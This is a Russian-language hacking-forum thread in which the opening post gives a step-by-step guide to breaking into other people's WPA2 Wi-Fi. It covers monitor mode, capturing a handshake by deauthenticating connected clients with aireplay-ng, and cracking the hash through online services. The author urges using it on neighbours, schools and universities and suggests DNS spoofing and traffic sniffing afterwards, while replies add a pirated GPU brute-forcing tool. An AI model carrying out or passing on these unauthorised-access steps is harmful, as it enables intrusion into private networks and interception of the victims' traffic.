[Личный способ] Взлом WI-FI за 5 минут! WPA2-PSK

Dav1d

Хакер
Статус
offline
Регистрация
26.01.2017
Сообщения
461
Репутация
624
Недавно решил помочь взломать вай фай одному челу, а в итоге мне в телегу отписало около 18 человек! Конечно, вы скажете, в инете и так полно инфы об этом, но людей, которые не знают много, а значит, инфу эту они не нашли. Именно для вас я пишу эту тему!
Поехали.

1. Скачиваем kali linux - https://www.kali.org/downloads/
1.1 Устанавливаем кали линукс на флешку или виртуальную машину
1.3 Запускаемся с флешки или виртуальной машины под кали

2. Открываем консоль
2.1 Пишем: iwconfig и проверяем, определяется ли наша сетевая карта! Если у вас на этом моменте проблемы(
с ноутбуками такого не будет), то вам нужно докупить эту карту. За 300 рублей можно взять юсб карту тплинк с алика и все будет в шоколаде.
2.2 Теперь включаем режим мониторинга: airmon-ng start wlan0(
влан0 - это значение из параметров сетевой карты, у вас оно может быть немного иное, например mon0)
2.3 Теперь нужно провести сканирование: airodump-ng wlan0
2.4 Здесь мы увидим список вай фай сетей в радиусе нашего аппарата, зависит от сетевой карты. Здесь нужно выбрать объект атаки, выбираем на свой вкус, я обычно беру того у кого сигнал лучше(
Уровень сигнала определяется сокращением pwr)
2.5 Теперь нам нужно нажать ctrl+c и остановить сканирование
2.6 Выбрали жертву и пишем: airodump-ng --bssid (
здесь пишем бссайди роутера жертвы, его вы видите выше) --channel(тут пишем канал, он обозначивается как ch, например 1 или 8) -w /tmp/nazvanie (это путь где будет конечный файл и название) wlan0
2.7 В самом низу видим тех, кто подключен к сети, выбираем того у кого в значении Frames большее количество(
он более активен)
3. Открываем еще одну консоль и пишем: aireplay-ng -0 1(1 - это кол-во пакетов деавторизации, ставьте сразу 50 и ждите) -а (здесь пишем бссайди роутера, его видим в самой верхней строке где его характеристики: уровень сигнала, канал и тд) -с (мак адрес пользователя, которого атакуем, узнать его мак можно под надписью STATION) wlan0
3.1 Ждем пока в первой консоли будет надпись с хендшейком, там еще время будет указано, она будет вверху. Делаем во второй консоли эту команду пока не пройдет хендшейк. Если совсем не проходит, то пишем эту команду заместо той: aireplay-ng -0 1 -a AP_BSSID -c CLIENT_BSSID mon0 —ignore-negative-one(
это для андроид устройств), еще можно деавторизовать сразу всю сеть aireplay-ng --deauth 5 -a (тут прописываешь мак роутера) wlan0
4. Когда получили хендшейк, идем по пути который мы указали и:
4.1 Расшифровываем этот хеш сами, даем людям которые могут это сделать
4.2 Обращаемся к сервису
https://xsrc.ru(не рекл) и кидаем сюда хеш, он быстро находит(у меня за пару секунд), может быть дольше, но явно быстрее чем на моем ноуте 2009 года :D
После расшифровки вам на почту придет письмо-оповещение, а чтобы получить пароль нужен ключ, 1 стоит 100 рублей, чем больше - тем дешевле. Это единственный минус этого способа, но я предпочитаю его. После покупки ключа он придет на почту, далее вводите его на сайте и готово.

Вот и готово, далее с нашей, теперь нашей! сетью делаем что хотим: подменяем днс, слушаем трафик или просто смотрит фильмы и сидим на нашем любимом форуме :)
PS. Отпишите свое мнение об оформлении темы, удобно ли читать, не режет ли глаза и тд :)
PPS. Если есть вопросы, задавайте их только в этой теме! Потому что тем самым мы можем помочь сразу нескольким людям, у которых один вопрос.
(и набить вам, новичкам, сообщения :D)
UPD. http://wpa-sec.stanev.org/ Сервис для бесплатной расшифровки хешей, предоставил YouNigger
Спасибо тебе ;)


UPD2. Пару слов о безопасности в работе:
Если использовать данный метод на соседях, в школе, вузе, и прочих простых местах - не беда. Если же вы пойдете на офис, компанию, либо какое-либо место, имеющее важные данные - будьте готовы. Изучите базовые понятия безопасности в kali linux. Хотя врятли в +- серьёзной компании стоит самая простая защита, которую можно вскрыть таким способом. Обычно. У них данные идут через свой сервер, который нужно ломать, чтобы получить пароль.
О безопасности, когда вы сидите в взломанной/бесплатной точке wifi скажу пару правил:
Используйте VPN
Старайтесь не авторизовываться на важных сервисах
Либо пользуйтесь связкой VPN+TOP
Либо вместо впн можно юзать ssh туннель.
 
Последнее редактирование модератором:

NEX4MI

Резидент
Статус
offline
Регистрация
18.03.2017
Сообщения
127
Репутация
182
Годная тема, но поменяй цвет пункта 3 и 3.1, а то сливается и кровь из глаз, имхо
 

CyberFun

Участник
Статус
offline
Регистрация
08.08.2017
Сообщения
71
Репутация
37
Все понятно написано, но на счет оформления - лучше изменить цвета. Сделай либо все примерно одного цвета, либо сделай более мягкие цвета.
 

Dav1d

Хакер
Статус
offline
Регистрация
26.01.2017
Сообщения
461
Репутация
624
Все понятно написано, но на счет оформления - лучше изменить цвета. Сделай либо все примерно одного цвета, либо сделай более мягкие цвета.
Понял, так и сделаю! Спасибо
 

Rhod

Участник
Статус
offline
Регистрация
06.08.2016
Сообщения
67
Репутация
24
Кому не хочется всё проделывать командами в линуксе - качайте Airslax, там графическая оболочка и всё делается нажатием нескольких кнопок, есть свой брутер хендшейков. (на рутрекере есть ломанная 5 версия, в ней доступен брут через gpu, будет актуально тем, у кого нормальная видеокарта)
 

Dav1d

Хакер
Статус
offline
Регистрация
26.01.2017
Сообщения
461
Репутация
624
Кому не хочется всё проделывать командами в линуксе - качайте Airslax, там графическая оболочка и всё делается нажатием нескольких кнопок, есть свой брутер хендшейков. (на рутрекере есть ломанная 5 версия, в ней доступен брут через gpu, будет актуально тем, у кого нормальная видеокарта)
Спасибо за еще один способ! :)
 

InMafia

Заблокированные
Статус
offline
Регистрация
07.06.2017
Сообщения
229
Репутация
294
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
Неплохо, новичкам будет полезно.
Хотя новичкам наверное будет трудно кали установить, если не очень в этом разбираются.
 

Dav1d

Хакер
Статус
offline
Регистрация
26.01.2017
Сообщения
461
Репутация
624
Неплохо, новичкам будет полезно.
Хотя новичкам наверное будет трудно кали установить, если не очень в этом разбираются.
Тоже заметил, что это многих обременяет. Установить очень просто, а ориентироваться в ней сложнее :)
 

InMafia

Заблокированные
Статус
offline
Регистрация
07.06.2017
Сообщения
229
Репутация
294
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
Тоже заметил, что это многих обременяет. Установить очень просто, а ориентироваться в ней сложнее :)
Замути гайд для таких особей, если есть желание :)
 

etoveter

Новичок
Статус
offline
Регистрация
19.10.2017
Сообщения
2
Репутация
1
Рэпы не хватает,такой молодой и такие перспективы открыты
 

Vetal3k

Новичок
Статус
offline
Регистрация
24.10.2017
Сообщения
1
Репутация
1
Можно взглянуть?))
 

Fly

Резидент
Статус
offline
Регистрация
11.05.2016
Сообщения
176
Репутация
189
Бзз. Написано очень просто и понятно. Круто.
Если сам писал, то прям втройне круто.:Sun Bespectacled
 

Fly

Резидент
Статус
offline
Регистрация
11.05.2016
Сообщения
176
Репутация
189
А вообще, хотел бы вопрос задать. Kali сильно отжирает? Есть древнейший комп, который стоит у меня на второй хате как сервачок. На него поставил Debian 9(в графическом режиме) потом посмотрел на нагрузку на единственное ядро и 1гиг оперативы и решил отключить интерфейс. Щас всё хорошо. Не греется и почти не тупит)

Так вот, могу я Kali поставить/настроить в графике, а потом также отключить интерфейс, подключить WiFi(твоим способом:Assassin) и работать по SSH? А то щас через модем симочный - такое...
 

Dav1d

Хакер
Статус
offline
Регистрация
26.01.2017
Сообщения
461
Репутация
624
А вообще, хотел бы вопрос задать. Kali сильно отжирает? Есть древнейший комп, который стоит у меня на второй хате как сервачок. На него поставил Debian 9(в графическом режиме) потом посмотрел на нагрузку на единственное ядро и 1гиг оперативы и решил отключить интерфейс. Щас всё хорошо. Не греется и почти не тупит)

Так вот, могу я Kali поставить/настроить в графике, а потом также отключить интерфейс, подключить WiFi(твоим способом:Assassin) и работать по SSH? А то щас через модем симочный - такое...
Сам писал, спасибо :3
Нет, очень мало кушает, у меня ноут древний и все летает(кроме винды)
 

Negodai913

Новичок
Статус
offline
Регистрация
09.09.2016
Сообщения
9
Репутация
2
Последнее редактирование:

hackmemory

Новичок
Статус
offline
Регистрация
02.10.2017
Сообщения
10
Репутация
1
Можно глянуть? Репы не хватает :(
 

bedievis

Новичок
Статус
offline
Регистрация
26.06.2017
Сообщения
37
Репутация
6
тема годная, но мне кажется она не 5 минут займет,а больше. особенно у новичков